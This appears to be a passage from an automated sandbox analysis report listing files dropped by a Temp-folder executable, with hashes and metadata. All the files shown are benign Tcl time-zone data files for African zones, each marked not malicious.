                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                    Entropy (8bit):4.83500517532947
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Bamako) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):173
                                                                                                                                                                                                                                                    Entropy (8bit):4.834042129935993
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Bangui) $TZData(:Africa/Lagos).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                    Entropy (8bit):4.839691887198201
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Banjul) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):169
                                                                                                                                                                                                                                                    Entropy (8bit):4.8519768909236465
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Bissau) {. {-9223372036854775808 -3740 0 LMT}. {-1830380260 -3600 0 WAT}. {157770000 0 0 GMT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):178
                                                                                                                                                                                                                                                    Entropy (8bit):4.856245693637169
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Blantyre) $TZData(:Africa/Maputo).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):178
                                                                                                                                                                                                                                                    Entropy (8bit):4.853052123353996
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Brazzaville) $TZData(:Africa/Lagos).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                    Entropy (8bit):4.900915013374923
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Bujumbura) $TZData(:Africa/Maputo).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3720
                                                                                                                                                                                                                                                    Entropy (8bit):3.687670811431724
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Cairo) {. {-9223372036854775808 7509 0 LMT}. {-2185409109 7200 0 EET}. {-929844000 10800 1 EEST}. {-923108400 7200 0 EET}. {-906170400 10800 1 EEST}. {-892868400 7200 0 EET}. {-875844000 10800 1 EEST}. {-857790000 7200 0 EET}. {-844308000 10800 1 EEST}. {-825822000 7200 0 EET}. {-812685600 10800 1 EEST}. {-794199600 7200 0 EET}. {-779853600 10800 1 EEST}. {-762663600 7200 0 EET}. {-399088800 10800 1 EEST}. {-386650800 7200 0 EET}. {-368330400 10800 1 EEST}. {-355114800 7200 0 EET}. {-336790800 10800 1 EEST}. {-323654400 7200 0 EET}. {-305168400 10800 1 EEST}. {-292032000 7200 0 EET}. {-273632400 10800 1 EEST}. {-260496000 7200 0 EET}. {-242096400 10800 1 EEST}. {-228960000 7200 0 EET}. {-210560400 10800 1 EEST}. {-197424000 7200 0 EET}. {-178938000 10800 1 EEST}. {-165801600 7200 0 EET}. {-147402000 10800 1 EEST}. {-134265600 72
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6176
                                                                                                                                                                                                                                                    Entropy (8bit):3.728783348029229
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Casablanca) {. {-9223372036854775808 -1820 0 LMT}. {-1773012580 0 0 WET}. {-956361600 3600 1 WEST}. {-950490000 0 0 WET}. {-942019200 3600 1 WEST}. {-761187600 0 0 WET}. {-617241600 3600 1 WEST}. {-605149200 0 0 WET}. {-81432000 3600 1 WEST}. {-71110800 0 0 WET}. {141264000 3600 1 WEST}. {147222000 0 0 WET}. {199756800 3600 1 WEST}. {207702000 0 0 WET}. {231292800 3600 1 WEST}. {244249200 0 0 WET}. {265507200 3600 1 WEST}. {271033200 0 0 WET}. {448243200 3600 0 CET}. {504918000 0 0 WET}. {1212278400 3600 1 WEST}. {1220223600 0 0 WET}. {1243814400 3600 1 WEST}. {1250809200 0 0 WET}. {1272758400 3600 1 WEST}. {1281222000 0 0 WET}. {1301788800 3600 1 WEST}. {1312066800 0 0 WET}. {1335664800 3600 1 WEST}. {1342749600 0 0 WET}. {1345428000 3600 1 WEST}. {1348970400 0 0 WET}. {1367114400 3600 1 WEST}. {1373162400 0 0 WET}. {1
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7253
                                                                                                                                                                                                                                                    Entropy (8bit):3.743963604901828
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Ceuta) {. {-9223372036854775808 -1276 0 LMT}. {-2177451524 0 0 WET}. {-1630112400 3600 1 WEST}. {-1616810400 0 0 WET}. {-1451692800 0 0 WET}. {-1442451600 3600 1 WEST}. {-1427677200 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301274000 0 0 WET}. {-1293840000 0 0 WET}. {-81432000 3600 1 WEST}. {-71110800 0 0 WET}. {141264000 3600 1 WEST}. {147222000 0 0 WET}. {199756800 3600 1 WEST}. {207702000 0 0 WET}. {231292800 3600 1 WEST}. {244249200 0 0 WET}. {265507200 3600 1 WEST}. {271033200 0 0 WET}. {448243200 3600 0 CET}. {504918000 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 C
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):180
                                                                                                                                                                                                                                                    Entropy (8bit):4.832452688412801
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Conakry) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):178
                                                                                                                                                                                                                                                    Entropy (8bit):4.8075658510312484
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Dakar) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):186
                                                                                                                                                                                                                                                    Entropy (8bit):4.795449330458551
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Dar_es_Salaam) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                                                    Entropy (8bit):4.779330261863059
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Djibouti) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):173
                                                                                                                                                                                                                                                    Entropy (8bit):4.800219030063992
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Douala) $TZData(:Africa/Lagos).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5885
                                                                                                                                                                                                                                                    Entropy (8bit):3.727945999721289
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/El_Aaiun) {. {-9223372036854775808 -3168 0 LMT}. {-1136070432 -3600 0 WAT}. {198291600 0 0 WET}. {199756800 3600 1 WEST}. {207702000 0 0 WET}. {231292800 3600 1 WEST}. {244249200 0 0 WET}. {265507200 3600 1 WEST}. {271033200 0 0 WET}. {1212278400 3600 1 WEST}. {1220223600 0 0 WET}. {1243814400 3600 1 WEST}. {1250809200 0 0 WET}. {1272758400 3600 1 WEST}. {1281222000 0 0 WET}. {1301788800 3600 1 WEST}. {1312066800 0 0 WET}. {1335664800 3600 1 WEST}. {1342749600 0 0 WET}. {1345428000 3600 1 WEST}. {1348970400 0 0 WET}. {1367114400 3600 1 WEST}. {1373162400 0 0 WET}. {1376100000 3600 1 WEST}. {1382839200 0 0 WET}. {1396144800 3600 1 WEST}. {1403920800 0 0 WET}. {1406944800 3600 1 WEST}. {1414288800 0 0 WET}. {1427594400 3600 1 WEST}. {1434247200 0 0 WET}. {1437271200 3600 1 WEST}. {1445738400 0 0 WET}. {1459044000 3600 1 WEST
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                                                    Entropy (8bit):4.817633094200984
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqss1kvFVAIgNGE4Rvt2Dcu5sp4DcsP:SlSWB9IZaM3y7sYFVAIgNT4tt2Dk4DBP
                                                                                                                                                                                                                                                    MD5:035B36DF91F67179C8696158F58D0CE8
                                                                                                                                                                                                                                                    SHA1:E43BFF33090324110048AC19CBA16C4ED8D8B3FE
                                                                                                                                                                                                                                                    SHA-256:3101942D9F3B2E852C1D1EA7ED85826AB9EA0F8953B9A0E6BAC32818A2EC9EDD
                                                                                                                                                                                                                                                    SHA-512:A7B52154C6085E5D234D6D658BA48D2C8EC093A429C3907BE7D16654F6EE9EBE8E3100187650956E5164B18340AB0C0979C1F4FA90EFE0CC423FBA5F14F45215
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Freetown) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):178
                                                                                                                                                                                                                                                    Entropy (8bit):4.8512443534123255
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62DcHK0o/4DcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62DAV+4G
                                                                                                                                                                                                                                                    MD5:BA2C7443CFCB3E29DB84FEC16B3B3843
                                                                                                                                                                                                                                                    SHA1:2BA7D68C48A79000B1C27588A20A751AA04C5779
                                                                                                                                                                                                                                                    SHA-256:28C1453496C2604AA5C42A88A060157BDFE22F28EDD1FBC7CC63B02324ED8445
                                                                                                                                                                                                                                                    SHA-512:B275ABAADA7352D303EFEAD66D897BE3099A33B80EA849F9F1D98D522AA9A3DC44E1D979C0ABF2D7886BACF2F86D25837C971ECE6B2AF731BE2EE0363939CBDE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Gaborone) $TZData(:Africa/Maputo).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):176
                                                                                                                                                                                                                                                    Entropy (8bit):4.835896095919456
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62Dc0B5h4DcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62Dlfh4G
                                                                                                                                                                                                                                                    MD5:59137CFDB8E4B48599FB417E0D8A4A70
                                                                                                                                                                                                                                                    SHA1:F13F9932C0445911E395377FB51B859E4F72862A
                                                                                                                                                                                                                                                    SHA-256:E633C6B619782DA7C21D548E06E6C46A845033936346506EA0F2D4CCCDA46028
                                                                                                                                                                                                                                                    SHA-512:2DCEB9A9FA59512ADCDE4946F055718A8C8236A912F6D521087FC348D52FFF462B5712633FDA5505876C500F5FD472381B3AC90CF1AEDF0C96EA08E0A0D3B7BA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Harare) $TZData(:Africa/Maputo).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):298
                                                                                                                                                                                                                                                    Entropy (8bit):4.638948195674004
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52DWbAm2OHePP1mXs0//HF20706VcF206KsF:MBp52DWkmdHePP1mcUvFxJVcFEKsF
                                                                                                                                                                                                                                                    MD5:256740512DCB35B4743D05CC24C636DB
                                                                                                                                                                                                                                                    SHA1:1FD418712B3D7191549BC0808CF180A682AF7FC1
                                                                                                                                                                                                                                                    SHA-256:768E9B2D9BE96295C35120414522FA6DD3EDA4500FE86B6D398AD452CAF6FA4B
                                                                                                                                                                                                                                                    SHA-512:DCFF6C02D1328297BE24E0A640F5823BFD23BDE67047671AC18EB0B1F450C717E273B27A48857F54A18D6877AB8132AAED94B2D87D2F962DA43FE473FC3DDC94
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Johannesburg) {. {-9223372036854775808 6720 0 LMT}. {-2458173120 5400 0 SAST}. {-2109288600 7200 0 SAST}. {-860976000 10800 1 SAST}. {-845254800 7200 0 SAST}. {-829526400 10800 1 SAST}. {-813805200 7200 0 SAST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):180
                                                                                                                                                                                                                                                    Entropy (8bit):4.884521503398915
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsIXR8HVAIgNGEkXR8o2DcdHl0DcIXR8u:SlSWB9IZaM3y7IXR8HVAIgNTkXR8o2D9
                                                                                                                                                                                                                                                    MD5:F0333A1DE72E7E3C8A13A7A4D9F2CCC7
                                                                                                                                                                                                                                                    SHA1:8D1259C2C4EE33790F88D392904D9DCDCE60A633
                                                                                                                                                                                                                                                    SHA-256:D5BA3C8C36E88E80EFA603B5BCEEADBFFFDDC87D47F47D2F15D62708E8346443
                                                                                                                                                                                                                                                    SHA-512:B4E3CE0BD12E629707A9FD338C4B36FBC74022404A8FC7BD16068571FBE61F2E87AD797737739E7E9C34D3A4604EC9AD8FCAA0836C0AA7AA14DC13523BFF93DF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Khartoum)]} {. LoadTimeZoneFile Africa/Khartoum.}.set TZData(:Africa/Juba) $TZData(:Africa/Khartoum).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):180
                                                                                                                                                                                                                                                    Entropy (8bit):4.787605387034664
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt2DcJEl2DcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL2DIEl2Dkr
                                                                                                                                                                                                                                                    MD5:8CF1CA04CD5FC03D3D96DC49E98D42D4
                                                                                                                                                                                                                                                    SHA1:4D326475E9216089C872D5716C54DEB94590FCDE
                                                                                                                                                                                                                                                    SHA-256:A166E17E3A4AB7C5B2425A17F905484EBFDBA971F88A221155BCA1EC5D28EA96
                                                                                                                                                                                                                                                    SHA-512:1301B9469ED396198A2B87CBA254C66B148036C0117D7D4A8286CB8729296AD735DF16581AEF0715CEE24213E91970F181824F3A64BCF91435FDAD85DCD78C84
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Kampala) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1063
                                                                                                                                                                                                                                                    Entropy (8bit):3.967955792980027
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQWe9hXn0Vb0iluy8pLXeKXhCvN9U0TlW50qCPR8jYJRFp0Q8SdAri/8+u8Wb2:5vn010ilux1XeKXhCvN9U0TMGqCp8jYH
                                                                                                                                                                                                                                                    MD5:58D2DAB313AF844E330560A3ECFCB150
                                                                                                                                                                                                                                                    SHA1:2ACBE3F6BFE4A0435BF7B1BE1D1AFEC74F1B61BB
                                                                                                                                                                                                                                                    SHA-256:4AE7C0262505994EFD358165D8A3D896ED3D7766EB2F2EC0029E54CC27663A11
                                                                                                                                                                                                                                                    SHA-512:35CF9D2D1B13C21BD672A1960F2A77A3FD7F52DA208990D4D10891A4FD87CE90E946A5FF1383FB11F0B3675C335B1EAD5B4F1913AB1302ED550CE94D1B21E7A2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Khartoum) {. {-9223372036854775808 7808 0 LMT}. {-1230775808 7200 0 CAT}. {10360800 10800 1 CAST}. {24786000 7200 0 CAT}. {41810400 10800 1 CAST}. {56322000 7200 0 CAT}. {73432800 10800 1 CAST}. {87944400 7200 0 CAT}. {104882400 10800 1 CAST}. {119480400 7200 0 CAT}. {136332000 10800 1 CAST}. {151016400 7200 0 CAT}. {167781600 10800 1 CAST}. {182552400 7200 0 CAT}. {199231200 10800 1 CAST}. {214174800 7200 0 CAT}. {230680800 10800 1 CAST}. {245710800 7200 0 CAT}. {262735200 10800 1 CAST}. {277246800 7200 0 CAT}. {294184800 10800 1 CAST}. {308782800 7200 0 CAT}. {325634400 10800 1 CAST}. {340405200 7200 0 CAT}. {357084000 10800 1 CAST}. {371941200 7200 0 CAT}. {388533600 10800 1 CAST}. {403477200 7200 0 CAT}. {419983200 10800 1 CAST}. {435013200 7200 0 CAT}. {452037600 10800 1 CAST}. {466635600 7200 0 CAT}. {483487200 10800 1
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):176
                                                                                                                                                                                                                                                    Entropy (8bit):4.8623059127375585
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62DcCJRx+DcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62DRX+Da
                                                                                                                                                                                                                                                    MD5:32AE0D7A7E7F0DF7AD0054E959A53B09
                                                                                                                                                                                                                                                    SHA1:AE455C96401EBB1B2BDE5674A71A182D9E12D7BD
                                                                                                                                                                                                                                                    SHA-256:7273FA039D250CABAE2ACCE926AB483B0BF16B0D77B9C2A7B499B9BDFB9E1CBB
                                                                                                                                                                                                                                                    SHA-512:DC8E89A75D7212D398A253E6FF3D10AF72B7E14CBC07CA53C6CB01C8CE40FB12375E50AD4291C973C872566F8D875D1E1A2CF0A38F02C91355B957095004563E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Kigali) $TZData(:Africa/Maputo).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):175
                                                                                                                                                                                                                                                    Entropy (8bit):4.816805447465336
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsGe4FVAIgNGESIRL2DcqQFeDcGev:SlSWB9IZaM3y7V4FVAIgNT9L2DdD4v
                                                                                                                                                                                                                                                    MD5:90EC372D6C8677249C8C2841432F0FB7
                                                                                                                                                                                                                                                    SHA1:5D5E549496962420F56897BC01887B09EC863D78
                                                                                                                                                                                                                                                    SHA-256:56F7CA006294049FA92704EDEAD78669C1E9EABE007C41F722E972BE2FD58A37
                                                                                                                                                                                                                                                    SHA-512:93FD7C8F5C6527DCCFBF21043AB5EED21862A22DA1FDB3ED7635723060C9252D76541DAD3A76EBF8C581A82A6DBEF2766DD428ACE3A9D6A45954A787B686B1CA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Kinshasa) $TZData(:Africa/Lagos).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):141
                                                                                                                                                                                                                                                    Entropy (8bit):4.965079502032549
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52DcGemFFkXGm2OHWTdvUQDWTFWZRYvCn:SlSWB9X52D4mFJm2OHWTdRDWTGRLn
                                                                                                                                                                                                                                                    MD5:51D7AC832AE95CFDE6098FFA6FA2B1C7
                                                                                                                                                                                                                                                    SHA1:9DA61FDA03B4EFDA7ACC3F83E8AB9495706CCEF1
                                                                                                                                                                                                                                                    SHA-256:EEDA5B96968552C12B916B39217005BF773A99CA17996893BC87BCC09966B954
